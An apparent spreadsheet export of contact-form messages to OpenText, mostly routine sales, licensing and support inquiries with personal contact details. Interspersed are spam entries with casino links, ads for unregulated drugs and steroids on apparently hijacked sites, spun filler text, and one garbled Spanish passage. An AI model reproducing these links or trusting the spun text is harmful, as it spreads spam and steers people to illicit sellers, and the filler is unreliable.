    <t xml:space="preserve">[url=http://www.zguld.se/Components/editor.asp?k=73-Cialis-Online-London-Cheap-Kamagra-Uk-Kamagra-Jelly-Online-Uk]Cialis Online London[/url]_x000D_
 Those who experience loud snoring know who bothersome it can be. People that sleep with a snorer fully realize! But have been you conscious that there is an much more intense method of snoring that really carries some heavy health risks? This is known as obstructive sleep apnea read more regarding this in this post._x000D_
  [url=http://www.ledabistro.com/db/lib.asp?id=398-igf-1-for-sale-jintropin-dosage-buy-igf-1-injections-online]igf-1 for sale[/url]_x000D_
 One of the better ways to get proteins turned into muscle mass properly is always to drink a proteins shake about thirty minutes for an hour well before your workout begins. This gives your whole body a chance to soak up the protein, and then it can utilize it quickly to start out constructing new muscle tissue._x000D_
  [url=http://www.compassodyssey.net/images/form.asp?qa=235]Hgh Fragment 176-191[/url]_x000D_
 Try out to stay away from supplements that advertise to assist increase your recollection. Usually, these capsules are certainly not successful and may give you bodily problems. Rather, you really should explore health supplements like Niacin, Thiamine, and B Vitamin-6. They all assist in improving the part of the human brain that handles recollection._x000D_
  [url=http://www.cinarinsaat.net/data/power.asp?id=385-igf-lr3-dosage-jintropin-for-sale-uk-igf-1-lr3-vs-des]igf lr3 dosage[/url]_x000D_
</t>
  </si>
  <si>
    <t>Please advise whether or not your company is associated with GXS? _x000D_
Does Just Play use your company for any other trading partners besides Toys R Us?_x000D_
I am requesting this info to determine if Just Play will remain active post 04/30</t>
  </si>
  <si>
    <t>I am interested in further information related to the OpenText™ Redact-It™ Desktop's capabilities and a product demonstration, if available.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a product called xDoc Pro 2.0.  It should have been associated with EMC / Document Sciences acquisition.  Could someone contact me to discuss please?  _x000D_
Thanks, Kevin  </t>
  </si>
  <si>
    <t xml:space="preserve">We are the Nashville office (in addition to Brentwood) and we'd like to discuss options for getting rid of our physical fax machine. We have about 100 employees in this location. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Im looking to purchase brava reader for my business, looking for 10no users, i have tried through the website but it fails on the paypal section for payment. </t>
  </si>
  <si>
    <t>I was wondering if it is still possible to acquire FormWare licenses.  We work with a Vendor Imagescan and one of there solutions used Formware.  We were told by them that Formware is no longer supported.  We need to obtain a new license due to a production issue.</t>
  </si>
  <si>
    <t>Just a simple question about OpenText 16 bulk download capabilities (limitations in number of files that can be downloaded at one time and file size). Please just provide file size and number limitations. We currently have OpenText and would just like to know download limitations in the newest version of OpenText, which we will be upgrading to later on this year. Thanks.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
The reason for my inquiry is we are looking to find out the developer license cost for Open Text's GUPTA TD NET 6.2 software._x000D_
_x000D_
Please advise of the cost (via emailed estimate if possible) as soon as possible._x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
Martin Ivancic  C.I.P. C.S.M PRINCE2._x000D_
Project Manager                                    _x000D_
Project Management Office_x000D_
Enterprise Business Solutions	 _x000D_
Financial Services Commission of Ontario_x000D_
5160 Yonge St, Toronto, ON M2N 6L9_x000D_
16th Floor_x000D_
Phone: 416 590 7164_x000D_
Fax: 416 590 7076</t>
  </si>
  <si>
    <t>Hello_x000D_
Our customer Northrop Grumman has asked us to quote some rightfax items and we wanted to see if we could get a quote._x000D_
Thanks Jolie</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://casinogamelistus.com/]real money casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
_x000D_
_x000D_
My name is Kerry Gale and I own a local bike shop called Velofix (www dot velofix dot com).  We packed a full service bike shop into a custom built Mercedes Benz Sprinter van, meaning we can bring all the tools, parts, expertise and skills right to your home, office, school or event._x000D_
_x000D_
_x000D_
_x000D_
I would love to arrange a day to have our shop come out to Open Text and tune-up your employees' bikes.  Your employees can bring their bikes to work and get a tune-up done on-site while they work!  We have employee-pay and company-pay options to meet any budget you may be working with.  We are very flexible and would love to tailor a service to your needs and budget.  It's a really great way to get your bikes ready for spring and promote a healthy workplace!_x000D_
_x000D_
_x000D_
_x000D_
Let me know if you’d like more information about our services or when we can arrange a time to talk._x000D_
_x000D_
_x000D_
_x000D_
Happy Riding!_x000D_
_x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Kerry Gale | Franchise Partner_x000D_
C: 519-781-0540_x000D_
velofix - Waterloo Region &amp; Caledon_x000D_
1-855-VELO FIX | www dot velofix dot com _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
I am looking to get some information on the managed services and b2b integration services._x000D_
_x000D_
We currently use your services but the commercials sit with our clients - we are looking to contract in on behalf of our client_x000D_
_x000D_
Thanks_x000D_
Carley _x000D_
</t>
  </si>
  <si>
    <t>Greetings, I am interested in learning more about Open Text Right Fax solutions, related to eFax._x000D_
_x000D_
Please let me know if we can have a brief call, and potentially a demo/capabilities meeting._x000D_
_x000D_
Thank you._x000D_
-	Rob</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://casinogamelistus.com/]casino slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;kasino&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Hi, I was looking for a name and email contact to send a RFI to.  thank you</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]slot game[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casinos online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casinos online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]best online casino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino real money&lt;/a&gt;</t>
  </si>
  <si>
    <t>We are looking for an OCR solution to automate our supplier invoice processing.</t>
  </si>
  <si>
    <t>Hello,_x000D_
we would like to ask some questions about course "3-0188 OpenText Content Server System Administrator v16" we found in your site_x000D_
In your opinion an average SAP Basis experience is good enough to partecipate?_x000D_
Is there a way to follow the course in Italy (better in Milan)? _x000D_
After April 9th 2018 when will the course be organized? Is There also the opportunity to follow it in Italy (Milan is the best city for us)?_x000D_
We read about the possibility to arrange the course ad customer site: how does it works? Is it possible to organaze it in our office in Milan?_x000D_
_x000D_
Thank you in advance_x000D_
Kind regards_x000D_
Mirko</t>
  </si>
  <si>
    <t>Hi Sir/Madom,_x000D_
Please provide the access for Documentum forums, When ever I tried to open Documentum forums getting Permission denied message on Window._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Jalaja._x000D_
Tech Mahindra._x000D_
Hyderabad.</t>
  </si>
  <si>
    <t>We want to check if we can buy OpenText Directory Services. What is the cost of it?</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casinogamelistus.com/]slot online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino slots&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>I purchased 10 licenses for Brava! Desktop.  It looks like we may need roughly 30 licenses if I go with stand alone, but I would prefer to know the cost of the Network license, since we probably only have about 5 - 10 users using the application at any given time.  Would you please provide a quote for Network licensing?  Also, if we determine that the network licensing is the way we will go, can our purchase of the 10 stand alone licenses be converted to network?</t>
  </si>
  <si>
    <t>Hi,_x000D_
Our customer would like to have a license report of all their license purchases. Is this possible? And what information should the customer provide?_x000D_
_x000D_
BR,_x000D_
Sanna</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are a SaaS Company based in Spain, and for a project we have the need to convert ".jbg" files to another image format like ".jpeg" or ".png" or even ".pdf", we understand that your software Captiva PixTools Toolkit is able to do it._x000D_
_x000D_
Could you send us some information and prices of this kit or libraries?_x000D_
_x000D_
Thank you so much._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi, we are looking at purchasing a number of Brava Reader network seats. Can you advise if these are suitable for use with Citrix? Many Thanks</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je vous contacte car nous souhaiterions faire la migration de nos applications StreamServe Persuasion 5.4.0 en version 5.4.6 sur windows server 2016._x000D_
Quelles sont les demarches pour qu'un consultant puisse nous aider ?_x000D_
Cordialement_x000D_
Olivier Dziebowski</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
nous utilisons streamserv depuis un peu plus de 1 ans. _x000D_
Nous ne parvenons pas à nous connecter à votre espace de support._x000D_
_x000D_
Actuellement nous rencontrons un problème avec l'utilisation du story teller. Dés que nous l'ouvrons nous avons un message d'erreur : "point d'entrée introuvable ..."_x000D_
Il fonctionnait très bien il y a 4 mois._x000D_
_x000D_
Merci par avance de vos retour._x000D_
_x000D_
Cordialement_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have successfully registered to opentext with my official mail id._x000D_
But I am not able to access any of the open discussion/topics of opentext documentum. _x000D_
_x000D_
Kindly look into the issue and let me know if I need to do some extra steps for getting the access._x000D_
_x000D_
Thanks in advance._x000D_
Sakshi Mishra</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.adanakompresor.net/css/assets.asp?xx=57]Kigtropin Nedir[/url]_x000D_
 Anyone who has ever actually put in time sportfishing, is aware of the excellent entertainment and feeling of rest it could bring. Those people who are considering being familiar with the sport, would prosper to get just as much understanding as possible just before they engage in their first angling trip. By taking the tips within this bit to heart, it is easy to get ready to get a enjoyable, successful sport fishing journey, even should it be your original time out._x000D_
  [url=http://www.accessindia.in/achieve/simple.asp?currency=232-Kamagra-100mg-Pour-Femme-Vente-Kamagra-100mg-Achat-Levitra-Bayer]Kamagra 100mg Pour Femme[/url]_x000D_
 Getting your car insurance coverage can be quite a overwhelming project. With the amount of selections from carriers to coverage types and special discounts, how would you get the thing you need to get the best achievable price? Read on this informative article for several superb advice on your auto insurance purchasing questions._x000D_
  [url=http://www.trishir.com/academia/break.asp?dark=441]Venta Viagra Cialis[/url]_x000D_
 Irrespective of what skin type you might have, you should preserve it. If you wish to avoid from expensive plastic surgery later on, the best strategy is to deal with your skin layer at the moment. The recommendations listed in the following paragraphs will allow you to maintain your skin layer and sustain a shining complexion.Follow These Suggestions To Learn How To Guide Your Pet_x000D_
  [url=http://www.indiriliyor.com/images/confuse.asp?prg=88]Cialis GÃ©nÃ©rique En Ligne[/url]_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir_x000D_
_x000D_
I am starting up my own business as consultant and want to start provinding basic GDPR information to small businesses here in the Netherlands. I saw your intro (which is good) and I boldly wanted to ask if I am allowed to use it for my business?_x000D_
_x000D_
I will only use it in the netherlands and it will be in Dutch_x000D_
_x000D_
In anticipation of your feedback_x000D_
_x000D_
Kind regards_x000D_
_x000D_
David Civile_x000D_
+31615105250</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to request a quote for 7 users over a period of 3 years </t>
  </si>
  <si>
    <t>I have a question about the course: 3-7620 OpenText Exstream - Exstream System Administration. I would like to attend this course, I understand this is a virtual classroom so that should not be a problem. What are the course dates (April 30 and May 17)? What time (timezone) will the virtual classroom start? If I subscribe, can my collegae also participate?_x000D_
_x000D_
Kind regards,_x000D_
Jorg Nugter</t>
  </si>
  <si>
    <t>Would like to know the pricing of Composer Notes for migrating IBM Lotus Notes 8.5.3   to .Net 2010 for my company.</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casinogamelistus.com/]slot online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you are doing great._x000D_
_x000D_
I am reaching out to you on behalf of our client that might be interested in using one of your solutions- Opentext (TeamSite). The client itself is a multinational manufacturing company with presence across the globe. Right now we are in the initial stages of estimating the standalone costs for a particular site owned by our client._x000D_
_x000D_
We are looking for indicative costs of implementing your solution over a single site with a limited number of users._x000D_
_x000D_
We would really appreciate if you can provide us with the price of a typical medium sized implementation with about 30 ERP licenses. Would really appreciate if you can provide both one time and ongoing support costs._x000D_
_x000D_
We fully understand that the price provided now would not have any contractual obligations attached and that the costs would also change based on requirements of the client. This does not and will not in the future affect the decision of the client in choosing a suitable solution._x000D_
_x000D_
Please feel free to call or email me at the coordinates below if you have any questions._x000D_
_x000D_
Regards,_x000D_
Vibhor Singhal</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.jessicaspa.com/counter/serach.asp?y=128-Viagra-PreÃ§o-Generico-Viagra-PreÃ§o-Lovegra-Comprar]Viagra PreÃ§o[/url]_x000D_
 In case you have a residence alarm system, be sure you're utilizing it appropriately! Your house owner's insurance coverage gives you a price reduction for adding a security process, but that discount will disappear if a person is able to deprive your residence whilst the method is into position. Don't let that happen to you!_x000D_
  [url=http://www.hanzlifts.com/admin/images/logo.php?id=Kamagra-Bestellen-Nachnahme,Kamagra-Bestellen-GÃ¼nstig,Kamagra-Oral-Jelly-Preis-18/]Kamagra Bestellen Nachnahme[/url]_x000D_
 Having dim delicious chocolate can improve your head characteristics. Average intake of dark chocolates will not likely cause your clothing sizing to modify, but it generates a health reward by compelling your mind to release dopamine which is said to be responsible for increased human brain usefulness and recollection potential. Control is the key like with some other meals._x000D_
  [url=http://www.papedelca.com/modules/cache.php?p=50-Kamagra-Oral-Jelly-Livraison-Rapide-Kamagra-Oral-Jelly-100mg-Avis-Kamagra-Suisse]Kamagra Oral Jelly Livraison Rapide[/url]_x000D_
 Be proud when you are shedding weight! Will not sucker your self into getting the very small bikini you want you could potentially put on or possibly a new outfit that may go on a massive amount of fat loss to match your body. Alternatively, enjoy slight weight loss objectives by permitting a manicure or even a therapeutic massage. The prize could be whatever is around you and your nicely- simply being as opposed to getting wrapped up in fitted into small clothing. If you do achieve a target and drop to dimensions you might be satisfied with, just buy that new ensemble!_x000D_
  [url=http://www.bangkokcontainer.com/Chaina/back.asp?e=140-Viagra-Generic-Cost-Buy-Viagra-With-Paypal-Viagra-Female-Use/]Viagra Generic Cost[/url]_x000D_
</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casinogamelistus.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino slots&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]online slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>Trial (Document Control Management )</t>
  </si>
  <si>
    <t>Hi, I'd like to check if I can request for a copy of color codes as we need to assign them before hand during item set-up so it will be easier to load items in GXS. Needs this document is asap as much as possible. Thanks!</t>
  </si>
  <si>
    <t>Wanting more info on the Rightfax solution</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online slots&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>Hello, I have a client that uses your DocuMentum product. They need to know if your platform deals with web accessibility. Any information is appreciated. Thank you!_x000D_
jenna</t>
  </si>
  <si>
    <t>I have a prospect who uses GoFile Room (Thomsen Reuters).  I'm looking for an online filing cabinet solution for them.  They are a business process outsourcer doing restaurant accounting.  They have over 30 customers, of which some have multiple store locations.  Security/Access to the documents needs to be based on customer, and also store level (ie, a store manager can't see all documents for all stores)...</t>
  </si>
  <si>
    <t xml:space="preserve">We have a on-premise RightFax appliance that went belly-up yesterday.  We are awaiting more information on support options (see information below) however I'd like to compare the options of repairing our existing appliance vs. purchasing a new one or moving to the hosted option.  HIPAA compliance would be required for the hosted solution.  The other critical piece is timing, we need to get this up and running ASAP.  Thanks  ~Patrick_x000D_
SUID: 69578-12246_x000D_
S/N DT2109415_x000D_
Ticket number: 3436571_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> I would like to explore options for document control systemization. </t>
  </si>
  <si>
    <t xml:space="preserve">Shopping cart system-paypal link is not working. Cannot fill order of 20 brava reader seats. </t>
  </si>
  <si>
    <t xml:space="preserve">Looking to purchase an EDRMS and would like a demonstration to see what solutions OpenText has to offer.  </t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinogamelistus.com/]online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">what is the difference between tx and txl?  I need the tiff reader for documents.  </t>
  </si>
  <si>
    <t>We are trying to send an RFI for an Operations Manual Initiative and need a contact email.  Tried sending to sales@opentext.com, but no response.  Thank You.</t>
  </si>
  <si>
    <t>we need to become edit compliance refer by nordstroms</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://casinogamelistus.com/]casino games[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino online&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>Hi, I need help locating a product acquired from EMC.  It was formerly called CambridgeDocs xDoc Converter.  Could someone contact me as soon as possible?  Thanks, Kevin</t>
  </si>
  <si>
    <t>I have a question about the licensing model for the Brava! Reader program. We have been using your free version for several years now and are considering upgrading to the paid version once the free version expires, but we are wondering whether the 10 seat network license that you offer is a floating license or or if it's tied to individual computers? In other words, if we purchase that option, will we be able to install the software on all company computers and only 10 people will be able to open it at a time, or are we limited to 10 installs overall? Thank you</t>
  </si>
  <si>
    <t>I would like to discuss the ICE license for RightFax.</t>
  </si>
  <si>
    <t xml:space="preserve">Account # 781489. We wish to close our account. Please contact me with the instructions to do so. </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a demo for a D.A.M. solution </t>
  </si>
  <si>
    <t>We need to buy your Products for our client. We tried contacting your Dubai office 5 times today. However front office on phone was rude and kept us on hold. Please ask your Dubai Regional Head to Contact us. Client is Oman Insurance Company.</t>
  </si>
  <si>
    <t xml:space="preserve">Our company is interested in engaging several top solution providers in an RFP process to select an Electronic Document Management solution.  What would be the best way to engage your company regarding this?_x000D_
_x000D_
_x000D_
Jim Crowe_x000D_
Director of Information Systems_x000D_
The Marvin Companies_x000D_
PO Box 100, Warroad, MN. 56763_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I'd like to get in contact with our account manager or a sales representative to get an update on your global ECM offer?_x000D_
_x000D_
Thanks,_x000D_
Paul</t>
  </si>
  <si>
    <t>I would like to be contacted by OpenText</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://casinogamelistus.com/]casino online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>I have heard a rumor that the free Reader version is going away on April 18th?  Is this true?  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know if I can update time zone for local time. My time is currently set for the corporate office time zone and it throws me off regularly. I can see where I can change it in calendar events but not other locations. </t>
  </si>
  <si>
    <t>online casino gambling _x000D_
[url=http://casinogamelistus.com/]online casino games[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Greetings for the day._x000D_
_x000D_
My name is Ujjwal Chaudhary, and I’m contacting you on behalf of Infiniti Research, a sourcing advisory firm. _x000D_
_x000D_
We are currently conducting a supplier evaluation study (for a leading US-based pharmaceutical company) to identify Case Management solutions that have the below-mentioned capabilities. The geographical scope of the services is in the US._x000D_
_x000D_
Can the platform be utilized for the internal investigation related case management?	Yes/No_x000D_
Text-based search	Yes/No_x000D_
Tracking features (to avoid stale cases)	Yes/No_x000D_
Drop-down capability	Yes/No_x000D_
Categorization of cases	Yes/No_x000D_
Reclassification (after initial categorization)	Yes/No_x000D_
Integration with clients’ legacy systems	Yes/No_x000D_
Deployment (Cloud/On-premise)	Cloud/On-premise/Both_x000D_
Role-based access	Yes/No_x000D_
_x000D_
Also, we would like to understand that how your company utilizes AI concepts of machine learning and natural language processing (NLP) in case management tools._x000D_
_x000D_
In relation to that, we would like to have a discussion with you to understand your portfolio, capabilities, and strategic value chain tie-ups._x000D_
_x000D_
The information that you provide would be documented and shared with our client to help them understand supplier capabilities existing in the market._x000D_
_x000D_
Please share the details by 5th April 2018, end of business day. We will collate the information and share it with our client for further evaluation._x000D_
_x000D_
We thank you for your time and consideration. _x000D_
_x000D_
Regards,_x000D_
Ujjwal Chaudhary_x000D_
Procurement Consultant | Infiniti Research</t>
  </si>
  <si>
    <t>Can you please let me know how to add an GS1 Company Prefix to our account? We recently purchased a new prefix and need to add this to our account in order to upload some new items. Thanks for your help!</t>
  </si>
  <si>
    <t>Hi. I'm looking to get some baseline costs for a Voice of the Customer programme. Can you provide details? Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Good day, i write regards to my letter yesterday requesting for details about your email service, i will really appreciate your prompt respond._x000D_
_x000D_
Tracy Atherton_x000D_
Cable Technology, CT._x000D_
171 Tolland Turnpike_x000D_
Willington, CT 06279_x000D_
Phone (860) 300-3464, Ext 303_x000D_
Fax     (860) 300-3816_x000D_
Email: sales@cabletechnologyct.com_x000D_
</t>
  </si>
  <si>
    <t>The IFRC has just launched an RFP for a web/intranet/extranet portal. If you are interested, please contact us.</t>
  </si>
  <si>
    <t>request for cost of licence for one seat of Exceed</t>
  </si>
  <si>
    <t>Omniox is a preclinical, private biotechnology company based in San Carlos. I'd like to learn more about solutions offered by OT to help with info management, controls and compliance. Best, John</t>
  </si>
  <si>
    <t>I am contacting OpenText on behalf of a client with an upcoming vendor selection. My client has interest in sending an RFP for your software (Documentum), and we need to know the contact information for the recipient. Could you provide this information?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Reaching you regarding your participation in Drug Information Association Annual Meeting 2018_x000D_
Would you be interested in the attendee profiles of DIA 2018?_x000D_
Available Counts: 4,296 Contacts_x000D_
Usage: Unlimited._x000D_
Available Data Fields: Contact Name, Clinics/Hospital, Website, Job Title, Mailing Address and E-mail Addresses, Phone Number and FAX Number._x000D_
Let me know if you are interested and I will get back with pricing model. _x000D_
Best Regards,_x000D_
Linda Claire_x000D_
Sr. Marketing Specialist_x000D_
Linda@b2bdatatech.com_x000D_
 _x000D_
NY, USA_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning.  Requesting Enterprise Content Management system demo.    </t>
  </si>
  <si>
    <t>One of our cutomer need us to use OpenText Document Management to help in their business._x000D_
Is there any option to have a look and learn this product, as a demo._x000D_
please help us.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, ich benötige eine Lizenz für Exceed. Unser Software-Lieferant Comparex hat mir mitgeteilt, dass Bosch mit OpenText einen Direktvertrag hat. Wie komme ich an eine Lizenz?_x000D_
_x000D_
mfg_x000D_
Matthias Gaab</t>
  </si>
  <si>
    <t xml:space="preserve">buen dias yo he desarrolado desdes sqlwindows 4.0 hasta gupta team developer  1.1 y deseo actualizar </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for internship in Hyderabad in your esteem organisation.  Pursuing BBA 2nd in IBS college. Interested in HR department.  Looking forward to hear from you. Thanks in advance. </t>
  </si>
  <si>
    <t>I need to renew the support agreement. Our SUID is 74624-12263._x000D_
Thanks.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I had been dealing with Brenda Healey in regards to EnCase OnDemand training. I am supposed to be enrolled in the latest course offering. I have emailed Brenda several times with no response. Please advise.</t>
  </si>
  <si>
    <t>Hello, I am interested purchasing 7 licenses of simple image BravaReader._x000D_
How can I do it?_x000D_
thanks_x000D_
Dror Pollak</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://casinogamelistus.com/]online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>OpenText Content Suite ,OpenText Process Suite ,OpenText Discovery Suite product demo , evaluation as per business request</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.drumtrigger.com/ebaypics/later.php?all=685-Methenolone-Acetate-Half-Life-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate.html]Methenolone Acetate Half Life[/url]_x000D_
 Consult with a respected physiatrist whenever your back pain issues develop beyond your capacity for self-remedy. Physiatrists are experts for treating traumas that impede your selection of movement, including spine issues. They often times have the experience to fix your back again troubles, and they can use any essential therapy lacking surgical procedures._x000D_
  [url=http://www.sejeunes.com/modules/heart.php?format=625-Methandienone-Effects,Testosterone-Powder-India,Trenbolone-Cost-Uk]Methandienone Effects[/url]_x000D_
 View the reduced-excess fat snacks. A lot of people think that because a goody is reduced-excess fat, then a calorie consumption aren't as great. This can lead you to eat too much as you think these snack foods are much better. Reduced-extra fat snacks truly don't help save that lots of calorie consumption. If you do consume them, eat as a lot of them while you would, a regular goody._x000D_
  [url=http://www.ymaudit.com/libraries/send.php?gn=220-Buy-Methenolone-Enanthate-Powder,Oxandrolone-Uk,Testosterone-Isocaproate-Uses]Buy Methenolone Enanthate Powder[/url]_x000D_
 Even if you have carpeted inside your living room area you can place a location carpet from the seating area to create a great feel. You can put it therefore it is released before the sitting place. In this way, you should have a good area rug to consider, along with your rug looking at your sofa will not likely get donned._x000D_
  [url=http://history.vniidad.ru/cache/simple.php?at=678-Methenolone-Stanozolol-Side-Effects-Testosterone-Enanthate-Suppliers-Uk.html]Methenolone[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">HI,_x000D_
We are installing a new server for streamserve to replace our very old server (Windows 2000) that is not working very well.  My question now is: Can we get a temporary license for the new server during the test phase or how should we proceed? _x000D_
_x000D_
Kind regards,_x000D_
/Fia_x000D_
</t>
  </si>
  <si>
    <t>Wir würden gerne eine Testlizenz anfragen ob Ihr Produkt "OpenText Brava! DWG Viewer" für unseren Betrieb interessant ist._x000D_
_x000D_
Ebenso würde uns interessieren ob es mit der Software möglich ist 3D PDF's anzuschauen._x000D_
Vielen dank schon einmal.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We have trouble finding a correspondent in France to discuss about your MFT solution. We would like to be able to include your solution in our assessment but fail to have someone qualified to do so._x000D_
Thank you for your follow-up._x000D_
Best regards._x000D_
Benoist Ober</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ;_x000D_
Brava that we bought on 03/26/2010! I can not download the Desktop. Where can I download and access my license information?_x000D_
_x000D_
IGC License Order #8000016330/24238 PO Number: Signed Quote 00494197 </t>
  </si>
  <si>
    <t>Need for technical architecture insight in the context of an offer we are preparing and in which we consider including OpenText. How does OpenText manage its user (referencing AD ?) How does it authenticate them (possible integration with federated identity services?)? How does it manage access rights (Role based referencing AD?) Discretionary - ACL ... ?)? Does it support/offer data encipherment? Does it offer WS SOAP/REST interfaces? How does it support data classification/categorisation (metadata management)?</t>
  </si>
  <si>
    <t>eacute;reo de Estados Unidos, pero en los &amp;uacute;ltimos meses han continuado los combates en esa importante provincial del norte del pa&amp;iacute;s.078 millones como consecuencia de la reforma fiscal que afect&amp;oacute; a las retenciones del trabajo y del capital.un autom&amp;oacute;vil), una vez que pude sentarme y ponerme a resguardo del calor, una vez que beb&amp;iacute; agua, inmediatamente me sent&amp;iacute; mejor, dijo Clinton durante una entrevista telef&amp;oacute;nica con la cadena CNN. _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20women%20ssss%20s%20triumph%20iso%202]saucony women's triumph iso 2[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=spiderman%20sneakers]spiderman sneakers[/url]_x000D_
 _x000D_
Tambi&amp;eacute;n que en Castilla y Le&amp;oacute;n la infancia es el grupo de poblaci&amp;oacute;n m&amp;aacute;s afectado por la pobreza (22%) sumando 83.&amp;laquo;La concesi&amp;oacute;n de la Autorizaci&amp;oacute;n Ambiental Integrada es una buena noticia que no.Tambi&amp;eacute;n plante&amp;oacute; utilizar las herramientas del Plan Juncker para buscar recursos econ&amp;oacute;micos que permitan afrontar las inversiones.s3En busca de la fe perdida4Viaje hacia la permanencia5Tranquilidad, ven a m&amp;iacute;6Mi&amp;ntilde;&amp;aacute;mbres toma el relevo a Paulino en el Atl&amp;eacute;tico Astorga7Paulino abandona el banquillo del Atl&amp;eacute;tico Astorga8Los dorsales de este equipo son las ofertas de un supermercado9Carteles para la historia10Kike Reguero, nuevo portero del Atl&amp;eacute;tico Astorga12Gitanos, sin etiquetas1s://vimeo/2122191582Fervor y pasi?n3Fervor por 'La Morenica'4La guerra no ha terminado5El autismo y la eterna espera6Tattoo Mo-Gur, 20 a?os de arte en la piel7?Bebamos una copina de Genar?n?8La C?mara de Comercio de Astorga organiza una jornada de sensibilizaci?n y fomento de emprendimiento rural9Tranquilidad, ven a m?10La Guardia Civil detiene a ocho personas y desarticula un grupo criminal del alfoz de Le?n dedicado al robo de veh?culosTemas SD Ponferradina,f?tbol,Segunda Divisi?n BTAGSmonstruo,  viene,  vermeD</t>
  </si>
  <si>
    <t xml:space="preserve">Working with US trade corporation from Belgium and France </t>
  </si>
  <si>
    <t>Kindly advise if EasyLink has the portal/website where we can download invoices. Thank you.</t>
  </si>
  <si>
    <t>Hello, I am testing software._x000D_
_x000D_
Hope you can help me._x000D_
The project I am on is implementing OpenText Brava to store images_x000D_
